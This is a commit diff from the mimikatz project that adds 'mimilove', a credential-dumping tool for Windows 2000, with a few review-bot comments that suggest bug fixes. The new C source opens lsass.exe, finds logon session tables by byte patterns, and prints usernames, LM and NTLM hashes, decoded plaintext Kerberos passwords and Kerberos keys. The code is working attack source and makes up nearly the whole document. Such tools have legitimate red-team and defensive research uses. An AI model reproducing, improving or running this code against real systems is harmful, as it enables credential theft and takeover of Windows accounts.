mimilove for Windows 2000 <3

Benjamin DELPY 2015-07-19 02:34:06 +02:00
parent 5084e9d803
commit 9bac6378c6
14 changed files with 763 additions and 43 deletions




@ -41,6 +41,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mimilib", "mimilib\mimilib.
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mimidrv", "mimidrv\mimidrv.vcxproj", "{86FF6D04-208C-442F-B27C-E4255DD39402}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mimilove", "mimilove\mimilove.vcxproj", "{60D02E32-1711-4D9E-9AC2-10627C52EB40}"
EndProject
Global
GlobalSection(SubversionScc) = preSolution
Svn-Managed = True
@ -73,6 +75,11 @@ Global
{86FF6D04-208C-442F-B27C-E4255DD39402}.Release|x64.Build.0 = Release|x64
{86FF6D04-208C-442F-B27C-E4255DD39402}.Second_Release_PowerShell|Win32.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Second_Release_PowerShell|x64.ActiveCfg = Release|x64
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|Win32.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|Win32.Build.0 = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|x64.ActiveCfg = Release|x64
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Second_Release_PowerShell|Win32.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Second_Release_PowerShell|x64.ActiveCfg = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE


@ -320,14 +320,18 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
kull_m_string_getUnicodeString(sessionData.UserName, cLsass.hLsassMem);
kull_m_string_getUnicodeString(sessionData.LogonDomain, cLsass.hLsassMem);
kull_m_string_getUnicodeString(sessionData.LogonServer, cLsass.hLsassMem);
kuhl_m_sekurlsa_utils_getSid(&sessionData.pSid, cLsass.hLsassMem);
kull_m_string_getSid(&sessionData.pSid, cLsass.hLsassMem);
retCallback = callback(&sessionData, pOptionalData);
LocalFree(sessionData.UserName->Buffer);
LocalFree(sessionData.LogonDomain->Buffer);
LocalFree(sessionData.LogonServer->Buffer);
LocalFree(sessionData.pSid);
if(sessionData.UserName->Buffer)
LocalFree(sessionData.UserName->Buffer);
if(sessionData.LogonDomain->Buffer)
LocalFree(sessionData.LogonDomain->Buffer);
if(sessionData.LogonServer->Buffer)
LocalFree(sessionData.LogonServer->Buffer);
if(sessionData.pSid)
LocalFree(sessionData.pSid);
data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink;
}
@ -692,7 +696,7 @@ void kuhl_m_sekurlsa_trust_domaininfo(struct _KDC_DOMAIN_INFO * info)
if(kull_m_string_getUnicodeString(&info->NetBiosName, cLsass.hLsassMem))
{
kprintf(L"\nDomain: %wZ (%wZ", &info->FullDomainName, &info->NetBiosName);
if(kuhl_m_sekurlsa_utils_getSid(&info->DomainSid, cLsass.hLsassMem))
if(kull_m_string_getSid(&info->DomainSid, cLsass.hLsassMem))
{
kprintf(L" / "); kull_m_string_displaySID(info->DomainSid);
LocalFree(info->DomainSid);
@ -916,8 +920,8 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
{
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY:
pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer;
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE);
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE);
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE);
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE);
kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName);
if(pPrimaryCreds->isLmOwfPassword)
@ -940,8 +944,8 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
break;
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10:
pPrimaryCreds10 = (PMSV1_0_PRIMARY_CREDENTIAL_10) credentials->Buffer;
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->UserName, FALSE);
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->LogonDomainName, FALSE);
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->UserName, FALSE);
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->LogonDomainName, FALSE);
kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds10->UserName, &pPrimaryCreds10->LogonDomainName);
kprintf(L"\n\t * Flags : I%02x/N%02x/L%02x/S%02x", pPrimaryCreds10->isIso, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword);
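Review bot: The NULL guards added in front of the four `LocalFree` calls in the first hunk protect only the free, while the return values of `kull_m_string_getUnicodeString` and `kull_m_string_getSid` just above them are still discarded, so a failed read of the target process is neither reported nor distinguishable from an empty string by the time `callback` runs. The guards are also only correct if a failing `kull_m_string_getUnicodeString` leaves `Buffer` NULL rather than still pointing at the remote address; that contract is not visible here, so it is worth pinning at the call site with `// getUnicodeString leaves Buffer NULL on failure, so the LocalFree guards below are safe` — once confirmed against the helper. `kuhl_m_sekurlsa_enum` starts and ends outside the hunk; the remaining three hunks of this file only rename the helpers.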


@ -175,34 +175,4 @@ PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(PKULL_M_MEMORY_ADDRESS pTable, ULO
resultat = kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(pTable, LUIDoffset, luidToFind);
}
return resultat;
}
void kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, BOOL relative)
{
if(String->Buffer)
String->Buffer = (PWSTR) ((ULONG_PTR)(String->Buffer) + ((relative ? -1 : 1) * (ULONG_PTR)(BaseAddress)));
}
BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid, IN PKULL_M_MEMORY_HANDLE source)
{
BOOL status = FALSE;
BYTE nbAuth;
DWORD sizeSid;
KULL_M_MEMORY_HANDLE hOwn = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aDestin = {&nbAuth, &hOwn};
KULL_M_MEMORY_ADDRESS aSource = {(PBYTE) *pSid + 1, source};
*pSid = NULL;
if(kull_m_memory_copy(&aDestin, &aSource, sizeof(BYTE)))
{
aSource.address = (PBYTE) aSource.address - 1;
sizeSid = 4 * nbAuth + 6 + 1 + 1;
if(aDestin.address = LocalAlloc(LPTR, sizeSid))
{
*pSid = (PSID) aDestin.address;
status = kull_m_memory_copy(&aDestin, &aSource, sizeSid);
}
}
return status;
}


@ -18,9 +18,6 @@ PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(PKULL_M_MEMORY_ADDRESS pTable, ULO
BOOL kuhl_m_sekurlsa_utils_search(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib);
BOOL kuhl_m_sekurlsa_utils_search_generic(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PVOID * genericPtr, PVOID * genericPtr1, PVOID * genericPtr2, PLONG genericOffset1);
void kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, BOOL relative);
BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid, IN PKULL_M_MEMORY_HANDLE source);
typedef struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS {
struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS *next;
ANSI_STRING Primary;

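--- /dev/null
+++ b/mimilove/mimilove.c
@@ -0,0 +1,389 @@
+#include "mimilove.h"
+int wmain(int argc, wchar_t *argv[])
+{
+DWORD pid;
+HANDLE hProcess;
+PKULL_M_MEMORY_HANDLE hMemory;
+OSVERSIONINFO osInfo;
+kprintf(L"\n"
+L" .#####. " MIMILOVE_FULL L"\n"
+L" .## ^ ##. \n"
+L" ## / \\ ## /* * *\n"
+L" ## \\ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n"
+L" '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)\n"
+L" '#####' " MIMILOVE_SPECIAL L"* * */\n\n");
+RtlZeroMemory(&osInfo, sizeof(OSVERSIONINFO));
+osInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
+if(GetVersionEx(&osInfo))
+{
+if((osInfo.dwMajorVersion == 5) && (osInfo.dwMinorVersion == 0))
+{
+if(kull_m_process_getProcessIdForName(L"lsass.exe", &pid))
+{
+if(hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, pid))
+{
+if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &hMemory))
+{
+mimilove_lsasrv(hMemory);
+mimilove_kerberos(hMemory);
+kull_m_memory_close(hMemory);
+}
+CloseHandle(hProcess);
+}
+else PRINT_ERROR_AUTO(L"OpenProcess");
+}
+}
+else PRINT_ERROR(L"Only for Windows 2000\n");
+}
+else PRINT_ERROR_AUTO(L"GetVersionEx");
+return ERROR_SUCCESS;
+}
+BOOL kuhl_m_sekurlsa_utils_love_search(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION mi, PKULL_M_MINI_PATTERN pa, PVOID * genericPtr)
+{
+BOOL status = FALSE;
+KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
+KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, mi->DllBase.hMemory}, aLocalMemory = {NULL, &hLocalMemory};
+KULL_M_MEMORY_SEARCH sMemory = {{{mi->DllBase.address, mi->DllBase.hMemory}, mi->SizeOfImage}, NULL};
+aLocalMemory.address = pa->Pattern;
+if(kull_m_memory_search(&aLocalMemory, pa->Length, &sMemory, FALSE))
+{
+aLsassMemory.address = (PBYTE) sMemory.result + pa->offset;
+aLocalMemory.address = genericPtr;
+status = kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(PVOID));
+}
+return status;
+}
+const wchar_t * KUHL_M_SEKURLSA_LOGON_TYPE[] = {
+L"UndefinedLogonType",
+L"Unknown !",
+L"Interactive",
+L"Network",
+L"Batch",
+L"Service",
+L"Proxy",
+L"Unlock",
+L"NetworkCleartext",
+L"NewCredentials",
+L"RemoteInteractive",
+L"CachedInteractive",
+L"CachedRemoteInteractive",
+L"CachedUnlock",
+};
+const ANSI_STRING
+PRIMARY_STRING = {7, 8, "Primary"};
+void mimilove_lsasrv(PKULL_M_MEMORY_HANDLE hMemory)
+{
+BYTE PTRN_W2K_LogonSessionTable[] = {0xff, 0x50, 0x10, 0x85, 0xc0, 0x74};
+KULL_M_MINI_PATTERN paLsasrv = {sizeof(PTRN_W2K_LogonSessionTable), PTRN_W2K_LogonSessionTable, -9};
+PLIST_ENTRY LogonSessionTable = NULL;
+KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION miLsasrv;
+KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
+KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &hLocalMemory};
+PVOID base;
+KIWI_MSV1_0_LOGON_SESSION_TABLE_50 table;
+KIWI_MSV1_0_LIST_50 list;
+KIWI_MSV1_0_ENTRY_50 entry;
+KIWI_MSV1_0_CREDENTIALS credentials;
+KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
+PMSV1_0_PRIMARY_CREDENTIAL_50 pPrimaryCred;
+kprintf(L"========================================\n"
+L"LSASRV Credentials (MSV1_0, ...)\n"
+L"========================================\n\n"
+);
+if(kull_m_process_getVeryBasicModuleInformationsForName(hMemory, L"lsasrv.dll", &miLsasrv))
+{
+if(kuhl_m_sekurlsa_utils_love_search(&miLsasrv, &paLsasrv, (PVOID *) &LogonSessionTable))
+{
+aLocalMemory.address = &base; // buffer
+aLsassMemory.address = LogonSessionTable;
+if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(PVOID)))
+{
+if(aLsassMemory.address = base) // buffer
+{
+aLocalMemory.address = &table;
+if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_LOGON_SESSION_TABLE_50)))
+{
+base = (PBYTE) aLsassMemory.address + FIELD_OFFSET(KIWI_MSV1_0_LOGON_SESSION_TABLE_50, list);
+if(aLsassMemory.address = table.list.Flink)
+{
+while(aLsassMemory.address != base)
+{
+aLocalMemory.address = &list;
+if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_LIST_50)))
+{
+if(aLsassMemory.address = list.entry)
+{
+aLocalMemory.address = &entry;
+if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_ENTRY_50)))
+{
+if(aLsassMemory.address = entry.Credentials)
+{
+kull_m_string_getUnicodeString(&entry.UserName, hMemory);
+kull_m_string_getUnicodeString(&entry.Domaine, hMemory);
+kull_m_string_getSid(&entry.pSid, hMemory);
+kprintf(L"Authentication Id : %u ; %u (%08x:%08x)\n"
+L"Session : %s from %u\n"
+L"User Name : %wZ\n"
+L"Domain : %wZ\n"
+, entry.LocallyUniqueIdentifier.HighPart, entry.LocallyUniqueIdentifier.LowPart, entry.LocallyUniqueIdentifier.HighPart, entry.LocallyUniqueIdentifier.LowPart, KUHL_M_SEKURLSA_LOGON_TYPE[entry.LogonType], entry.Session, &entry.UserName, &entry.Domaine);
+kprintf(L"Logon Time : ");
+kull_m_string_displayLocalFileTime(&entry.LogonTime);
+kprintf(L"\nSID : ");
+if(entry.pSid)
+kull_m_string_displaySID(entry.pSid);
+kprintf(L"\n");
+if(entry.UserName.Buffer)
+LocalFree(entry.UserName.Buffer);
+if(entry.Domaine.Buffer)
+LocalFree(entry.Domaine.Buffer);
+if(entry.pSid)
+LocalFree(entry.pSid);
+while(aLsassMemory.address)
+{
+aLocalMemory.address = &credentials;
+if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_CREDENTIALS)))
+{
+if(aLsassMemory.address = credentials.PrimaryCredentials)
+{
+while(aLsassMemory.address)
+{
+aLocalMemory.address = &primaryCredentials;
+if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)))
+{
+kull_m_string_getUnicodeString((PUNICODE_STRING) &primaryCredentials.Primary, hMemory);
+kull_m_string_getUnicodeString((PUNICODE_STRING) &primaryCredentials.Credentials, hMemory);
+kprintf(L"\t[%Z]\n", &primaryCredentials.Primary);
+if(RtlEqualString(&primaryCredentials.Primary, &PRIMARY_STRING, FALSE))
+{
+pPrimaryCred = (PMSV1_0_PRIMARY_CREDENTIAL_50) primaryCredentials.Credentials.Buffer;
+kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCred, &pPrimaryCred->UserName, FALSE);
+kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCred, &pPrimaryCred->LogonDomainName, FALSE);
+kprintf(L"\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCred->UserName, &pPrimaryCred->LogonDomainName);
+if(pPrimaryCred->isLmOwfPassword)
+{
+kprintf(L"\n\t * LM : ");
+kull_m_string_wprintf_hex(pPrimaryCred->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
+}
+if(pPrimaryCred->isNtOwfPassword)
+{
+kprintf(L"\n\t * NTLM : ");
+kull_m_string_wprintf_hex(pPrimaryCred->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
+}
+kprintf(L"\n");
+}
+else
+{
+kull_m_string_wprintf_hex(primaryCredentials.Credentials.Buffer, primaryCredentials.Credentials.Length, 1 | (16 << 16));
+}
+if(primaryCredentials.Primary.Buffer)
+LocalFree(primaryCredentials.Primary.Buffer);
+if(primaryCredentials.Credentials.Buffer)
+LocalFree(primaryCredentials.Credentials.Buffer);
+aLsassMemory.address = primaryCredentials.next;
+}
+else
+{
+PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_MSV1_0_PRIMARY_CREDENTIALS");
+break;
+}
+}
+}
+aLsassMemory.address = credentials.next;
+}
+else
+{
+PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_MSV1_0_CREDENTIALS");
+break;
+}
+}
+kprintf(L"\n");
+}
+}
+else PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_MSV1_0_ENTRY_50");
+}
+else PRINT_ERROR(L"list.entry is NULL\n");
+aLsassMemory.address = list.Flink;
+}
+else
+{
+PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_MSV1_0_LIST_50");
+break;
+}
+}
+}
+else PRINT_ERROR(L"table.list is NULL\n");
+}
+else PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_MSV1_0_LOGON_SESSION_TABLE_50");
+}
+else PRINT_ERROR(L"LogonSessionTable is NULL\n");
+}
+else PRINT_ERROR_AUTO(L"kull_m_memory_copy / ptr 1");
+}
+else PRINT_ERROR_AUTO(L"lsasrv pattern not found");
+}
+else PRINT_ERROR_AUTO(L"lsasrv module info");
+}
+void mimilove_kerberos(PKULL_M_MEMORY_HANDLE hMemory)
+{
+BYTE PTRN_W2K_KerbLogonSessionList[] = {0x8b, 0x5c, 0x24, 0x18, 0x8b, 0x13};
+KULL_M_MINI_PATTERN paKerberos = {sizeof(PTRN_W2K_KerbLogonSessionList), PTRN_W2K_KerbLogonSessionList, -8};
+PLIST_ENTRY KerbLogonSessionList = NULL;
+KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION miKerberos;
+KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
+KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &hLocalMemory};
+PVOID base;
+BYTE hash;
+KIWI_KERBEROS_LOGON_SESSION_50 session;
+KIWI_KERBEROS_KEYS_LIST_5 keyList;
+PKERB_HASHPASSWORD_5 pKeys;
+DWORD i;
+UNICODE_STRING tmpBuffer;
+kprintf(L"========================================\n"
+L"KERBEROS Credentials (no tickets, sorry)\n"
+L"========================================\n\n"
+);
+if(kull_m_process_getVeryBasicModuleInformationsForName(hMemory, L"kerberos.dll", &miKerberos))
+{
+if(kuhl_m_sekurlsa_utils_love_search(&miKerberos, &paKerberos, (PVOID *) &KerbLogonSessionList))
+{
+aLocalMemory.address = &base; // buffer
+aLsassMemory.address = KerbLogonSessionList;
+if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(PVOID)))
+{
+if(aLsassMemory.address = base) // buffer
+{
+while(aLsassMemory.address != KerbLogonSessionList)
+{
+aLocalMemory.address = &session;
+if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_KERBEROS_LOGON_SESSION_50)))
+{
+if(session.Password.Length || session.pKeyList)
+{
+kull_m_string_getUnicodeString(&session.UserName, hMemory);
+kull_m_string_getUnicodeString(&session.Domaine, hMemory);
+kull_m_string_getUnicodeString(&session.Password, hMemory);
+kprintf(L"Authentication Id : %u ; %u (%08x:%08x)\n"
+L"User Name : %wZ\n"
+L"Domain : %wZ\n"
+L"Password : "
+, session.LocallyUniqueIdentifier.HighPart, session.LocallyUniqueIdentifier.LowPart, session.LocallyUniqueIdentifier.HighPart, session.LocallyUniqueIdentifier.LowPart, &session.UserName, &session.Domaine);
+hash = *((PBYTE) &session.Password.Length + 1); // please...
+*((PBYTE) &session.Password.Length + 1) = 0;
+RtlRunDecodeUnicodeString(hash, &session.Password);
+if(!session.Password.Length || kull_m_string_suspectUnicodeString(&session.Password))
+kprintf(L"%wZ", &session.Password);
+else
+kull_m_string_wprintf_hex(session.Password.Buffer, session.Password.Length, 1);
+kprintf(L"\n");
+if(aLsassMemory.address = session.pKeyList)
+{
+aLocalMemory.address = &keyList;
+if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_KERBEROS_KEYS_LIST_5)))
+{
+if(pKeys = (PKERB_HASHPASSWORD_5) LocalAlloc(LPTR, keyList.cbItem * sizeof(KERB_HASHPASSWORD_5)))
+{
+aLsassMemory.address = (PBYTE) session.pKeyList + sizeof(KIWI_KERBEROS_KEYS_LIST_5);
+aLocalMemory.address = pKeys;
+if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, keyList.cbItem * sizeof(KERB_HASHPASSWORD_5)))
+{
+for(i = 0; i < keyList.cbItem; i++)
+{
+kprintf(L"\t%s ", mimilove_kerberos_etype(pKeys[i].generic.Type));
+if(tmpBuffer.Length = tmpBuffer.MaximumLength = (USHORT) pKeys[i].generic.Size)
+{
+if(tmpBuffer.Buffer = (PWSTR) pKeys[i].generic.Checksump)
+{
+if(kull_m_string_getUnicodeString(&tmpBuffer, hMemory))
+{
+kull_m_string_wprintf_hex(tmpBuffer.Buffer, tmpBuffer.Length, 0); kprintf(L"\n");
+LocalFree(tmpBuffer.Buffer);
+}
+}
+}
+}
+}
+else PRINT_ERROR_AUTO(L"kull_m_memory_copy / KERB_HASHPASSWORD_5");
+LocalFree(pKeys);
+}
+}
+else PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_KERBEROS_KEYS_LIST_5");
+}
+kprintf(L"\n");
+if(session.UserName.Buffer)
+LocalFree(session.UserName.Buffer);
+if(session.Domaine.Buffer)
+LocalFree(session.Domaine.Buffer);
+if(session.Password.Buffer)
+LocalFree(session.Password.Buffer);
+}
+aLsassMemory.address = session.Entry.Flink;
+}
+else{
+PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_KERBEROS_LOGON_SESSION_50");
+break;
+}
+}
+}
+else PRINT_ERROR(L"KerbLogonSessionList is NULL\n");
+}
+else PRINT_ERROR_AUTO(L"kull_m_memory_copy / ptr 1");
+}
+else PRINT_ERROR_AUTO(L"kerberos pattern not found");
+}
+else PRINT_ERROR_AUTO(L"kerberos module info");
+}
+PCWCHAR mimilove_kerberos_etype(LONG eType)
+{
+PCWCHAR type;
+switch(eType)
+{
+case KERB_ETYPE_NULL: type = L"null "; break;
+case KERB_ETYPE_DES_PLAIN: type = L"des_plain "; break;
+case KERB_ETYPE_DES_CBC_CRC: type = L"des_cbc_crc "; break;
+case KERB_ETYPE_DES_CBC_MD4: type = L"des_cbc_md4 "; break;
+case KERB_ETYPE_DES_CBC_MD5: type = L"des_cbc_md5 "; break;
+case KERB_ETYPE_DES_CBC_MD5_NT: type = L"des_cbc_md5_nt "; break;
+case KERB_ETYPE_RC4_PLAIN: type = L"rc4_plain "; break;
+case KERB_ETYPE_RC4_PLAIN2: type = L"rc4_plain2 "; break;
+case KERB_ETYPE_RC4_PLAIN_EXP: type = L"rc4_plain_exp "; break;
+case KERB_ETYPE_RC4_LM: type = L"rc4_lm "; break;
+case KERB_ETYPE_RC4_MD4: type = L"rc4_md4 "; break;
+case KERB_ETYPE_RC4_SHA: type = L"rc4_sha "; break;
+case KERB_ETYPE_RC4_HMAC_NT: type = L"rc4_hmac_nt "; break;
+case KERB_ETYPE_RC4_HMAC_NT_EXP: type = L"rc4_hmac_nt_exp "; break;
+case KERB_ETYPE_RC4_PLAIN_OLD: type = L"rc4_plain_old "; break;
+case KERB_ETYPE_RC4_PLAIN_OLD_EXP: type = L"rc4_plain_old_exp"; break;
+case KERB_ETYPE_RC4_HMAC_OLD: type = L"rc4_hmac_old "; break;
+case KERB_ETYPE_RC4_HMAC_OLD_EXP: type = L"rc4_hmac_old_exp "; break;
+case KERB_ETYPE_AES128_CTS_HMAC_SHA1_96_PLAIN: type = L"aes128_hmac_plain"; break;
+case KERB_ETYPE_AES256_CTS_HMAC_SHA1_96_PLAIN: type = L"aes256_hmac_plain"; break;
+case KERB_ETYPE_AES128_CTS_HMAC_SHA1_96: type = L"aes128_hmac "; break;
+case KERB_ETYPE_AES256_CTS_HMAC_SHA1_96: type = L"aes256_hmac "; break;
+default: type = L"unknow "; break;
+}
+return type;
+}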
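Review bot: In `mimilove_lsasrv`, `KUHL_M_SEKURLSA_LOGON_TYPE[entry.LogonType]` (the kprintf right after the `kull_m_string_getSid` call) indexes the 14-entry table with a value copied verbatim out of the target process, so any `LogonType` of 14 or more reads past the array; index 1 already exists as the `L"Unknown !"` fallback, so the fix is `KUHL_M_SEKURLSA_LOGON_TYPE[(entry.LogonType < ARRAYSIZE(KUHL_M_SEKURLSA_LOGON_TYPE)) ? entry.LogonType : 1]`. The same trust-the-copied-value pattern appears in `mimilove_kerberos`, where `keyList.cbItem` sizes both the `LocalAlloc` and the copy with no upper bound, so a corrupt count turns into an arbitrarily large allocation (and the `cbItem * sizeof(KERB_HASHPASSWORD_5)` product can wrap on a 32-bit build); a sanity cap before the allocation would contain that. Separately, the two byte-poking lines under `// please...` would read more clearly on this little-endian-only target as `hash = (BYTE)(session.Password.Length >> 8); session.Password.Length &= 0xff;`, which states outright that the high byte of `Length` is the RtlRunDecode seed instead of reaching into the USHORT through a PBYTE.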

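--- /dev/null
+++ b/mimilove/mimilove.h
@@ -0,0 +1,127 @@
+/* Benjamin DELPY `gentilkiwi`
+http://blog.gentilkiwi.com
+benjamin@gentilkiwi.com
+Licence : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "globals.h"
+#define MIMILOVE L"mimilove"
+#define MIMILOVE_VERSION L"1.0"
+#define MIMILOVE_CODENAME L"Love edition <3"
+#define MIMILOVE_FULL MIMILOVE L" " MIMILOVE_VERSION L" \"" MIMILOVE_CODENAME L"\" (" TEXT(__DATE__) L" " TEXT(__TIME__) L")"
+#define MIMILOVE_SPECIAL L"Windows 2000 only! "
+#include "../modules/kull_m_output.h"
+#include "../modules/kull_m_memory.h"
+#include "../modules/kull_m_process.h"
+#include "../modules/kull_m_crypto_system.h"
+typedef struct _KULL_M_MINI_PATTERN {
+DWORD Length;
+BYTE *Pattern;
+LONG offset;
+} KULL_M_MINI_PATTERN, *PKULL_M_MINI_PATTERN;
+typedef struct _MSV1_0_PRIMARY_CREDENTIAL_50 {
+LSA_UNICODE_STRING LogonDomainName;
+LSA_UNICODE_STRING UserName;
+BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH];
+BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH];
+BOOLEAN isNtOwfPassword;
+BOOLEAN isLmOwfPassword;
+/* buffer */
+} MSV1_0_PRIMARY_CREDENTIAL_50, *PMSV1_0_PRIMARY_CREDENTIAL_50;
+typedef struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS {
+struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS *next;
+ANSI_STRING Primary;
+LSA_UNICODE_STRING Credentials;
+} KIWI_MSV1_0_PRIMARY_CREDENTIALS, *PKIWI_MSV1_0_PRIMARY_CREDENTIALS;
+typedef struct _KIWI_MSV1_0_CREDENTIALS {
+struct _KIWI_MSV1_0_CREDENTIALS *next;
+DWORD AuthenticationPackageId;
+PKIWI_MSV1_0_PRIMARY_CREDENTIALS PrimaryCredentials;
+} KIWI_MSV1_0_CREDENTIALS, *PKIWI_MSV1_0_CREDENTIALS;
+typedef struct _KIWI_MSV1_0_ENTRY_50 {
+LUID LocallyUniqueIdentifier;
+LSA_UNICODE_STRING UserName;
+LSA_UNICODE_STRING Domaine;
+PVOID unk0;
+PVOID unk1;
+PSID pSid;
+ULONG LogonType;
+ULONG Session;
+DWORD align;
+FILETIME LogonTime;
+PKIWI_MSV1_0_CREDENTIALS Credentials;
+ULONG unk19;
+PVOID unk20;
+PVOID unk21;
+PVOID unk22;
+} KIWI_MSV1_0_ENTRY_50, *PKIWI_MSV1_0_ENTRY_50;
+typedef struct _KIWI_MSV1_0_LIST_50 {
+struct _KIWI_MSV1_0_LIST_50 *Flink;
+struct _KIWI_MSV1_0_LIST_50 *Blink;
+DWORD unk0;
+DWORD lowLuid;
+PKIWI_MSV1_0_ENTRY_50 entry;
+} KIWI_MSV1_0_LIST_50, *PKIWI_MSV1_0_LIST_50;
+typedef struct _KIWI_MSV1_0_LOGON_SESSION_TABLE_50 {
+DWORD tag;
+DWORD unk0;
+DWORD count;
+DWORD unk1;
+LIST_ENTRY list; // PKIWI_MSV1_0_LIST_50
+} KIWI_MSV1_0_LOGON_SESSION_TABLE_50, *PKIWI_MSV1_0_LOGON_SESSION_TABLE_50;
+typedef struct _KIWI_KERBEROS_KEYS_LIST_5 {
+DWORD unk0; // dword_1233EC8 dd 4
+DWORD cbItem; // debug048:01233ECC dd 5
+PVOID unk1;
+PVOID unk2;
+//KERB_HASHPASSWORD_5 KeysEntries[ANYSIZE_ARRAY];
+} KIWI_KERBEROS_KEYS_LIST_5, *PKIWI_KERBEROS_KEYS_LIST_5;
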